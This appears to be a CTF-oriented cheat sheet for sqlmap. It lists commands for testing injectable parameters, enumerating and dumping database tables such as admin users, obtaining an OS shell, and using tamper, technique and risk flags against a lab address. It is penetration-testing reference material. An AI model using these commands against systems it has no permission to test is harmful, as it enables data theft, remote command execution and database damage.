___
__H__
___ ___[']_____ ___ ___ {version#stable}
|_ -| . [(] | .'| . |
|___|_ [.]_|_|_|__,| _|
|_|V... |_| http://sqlmap.org
Reference:
sqlmap -u http://10.10.10.10/debug.php?id=1 -p "id" --dbms=mysql --dump
sqlmap -u http://10.10.10.10/login.php --method POST --data "username=blah&password=blah&submitButton=Log+In" -p "password"
Save a burp request to a file named request.txt
:
sqlmap -r request.txt -p someparam
If there is a Host:
header, then sqlmap will figure out the target on its own.
Parameters including cookies should also be detected (probably), but don't rely on this to work.
Get database names:
sqlmap -r request.txt --dbs
Get tables of a database:
sqlmap -r request.txt -D admin --tables
Dump content of a table:
sqlmap -r request.txt -D "admin" -T users --dump
-p "param,param2"
--dbs
-D "database_name"
--tables
-T <table_name>
--dump
--os-shell
--dbms=mysql
--level <int>
--risk <int>
This is sadly not all that well documented. But in general --level
increases the number of requests sent, so the number of test cases for each attack type. Higher --risk
increases the chance to cause Denial of Service (DoS) or damage database content.
--level
max is 5
- level 1 default
- level 2 adds HTTP Cookie header testing
- level 3 adds HTTP User-Agent/Referer headers testing
- level 4 ????
- level 5 adds Host header testing
--risk
max is 3
- risk 1 default
- risk 2 adds heavy time-based SQL query injections
- risk 3 adds OR-based SQL injection tests (might damage database content!)
It should be mentioned that there is no "safe" --level
or --risk
to run SQLMap in a production environment. You can always cause damage depending on how poorly the API is coded by the developers.
Sqlmap tends to cache a lot of data, this might be annoying if there was a false positive or if you changed your captured request file. Do this to get rid of it:
--flush-session
--fresh-queries
--proxy http://localhost:8080
- Stacked queries (S)
- Union query based (U)
- Error based (E)
- Inline queries (I)
- Boolean blind (B)
- Time based blind (T)
Specify single technique or technique order
--technique U
--technique=BEUSTQ
For union based attacks you can specify the number of unions cols to test if the default is too small:
--union-cols=11
--union-cols=1-20
--cookie "cookiename=
--cookie "cookiename=cookieprefix"
CTFs sometimes do this in order to make it harder for you, they throw in some weird characters which are hard to work with on a utf-8 shell. One of the following parameters might help.
Convert output to hex during retrieval:
--hex
Redump entries having unknown character marker (?)
--repair
Character encoding for data retrieval
--encoding=
--tamper=charencode
--tamper=charencode,appendnullbyte,escapequotes
If you consistently want to add some string data before (prefix) or after (suffix) the injected paylods, then use these options. For example some brackets that need to be opened/closed to make the injection work.
--prefix "<str>"
--suffix "<str>"